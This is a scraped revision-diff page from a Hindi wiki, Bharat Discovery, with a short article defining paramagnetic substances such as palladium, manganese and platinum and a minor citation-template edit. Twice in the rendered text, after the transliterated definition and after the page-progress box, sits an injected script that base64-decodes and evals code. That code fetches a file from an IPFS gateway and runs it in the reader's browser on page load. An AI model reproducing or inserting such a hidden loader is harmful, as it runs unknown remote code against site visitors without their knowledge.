Difference between revisions of "पराचुम्बकीय पदार्थ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
m (Text replace - "|language=हिन्दी" to "|language=हिन्दी")
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Paramagnetic) पैलेडियम, मैंगनीज तथा प्लैटीनम जैसे [[पदार्थ]] [[चुम्बक|चुम्बकों]] द्वारा स्वतन्त्र रूप से आकर्षित होते हैं, जब इन पदार्थो को चुम्बक के पास लाया जाता है तो ये पदार्थ अपने आप को लम्बें अक्षों के सहारे ध्रुव के स्थिर खडे़ हो जाते हैं ऐसे पदार्थो को पराचुम्बकीय पदार्थ कहा जाता हैं।<ref>{{cite web |url=http://www.jkhealthworld.com/detail.php?id=5328 |title=चुम्बकीय आकर्षण शक्ति की रेखायें |accessmonthday=[[18 फ़रवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=जनकल्याण |language=हिन्दी }}</ref>
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Paramagnetic) पैलेडियम, मैंगनीज तथा प्लैटीनम जैसे [[पदार्थ]] [[चुम्बक|चुम्बकों]] द्वारा स्वतन्त्र रूप से आकर्षित होते हैं, जब इन पदार्थो को चुम्बक के पास लाया जाता है तो ये पदार्थ अपने आप को लम्बें अक्षों के सहारे ध्रुव के स्थिर खडे़ हो जाते हैं ऐसे पदार्थो को पराचुम्बकीय पदार्थ कहा जाता हैं।<ref>{{cite web |url=http://www.jkhealthworld.com/detail.php?id=5328 |title=चुम्बकीय आकर्षण शक्ति की रेखायें |accessmonthday=[[18 फ़रवरी]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=जनकल्याण |language=[[हिन्दी]] }}</ref>
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 11:37, 8 March 2011

(aangrezi:Paramagnetic) pailediyam, maianganij tatha plaitinam jaise padarth chumbakoan dvara svatantr roop se akarshit hote haian, jab in padartho ko chumbak ke pas laya jata hai to ye padarth apane ap ko lambean akshoan ke sahare dhruv ke sthir khade़ ho jate haian aise padartho ko parachumbakiy padarth kaha jata haian.[1] <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh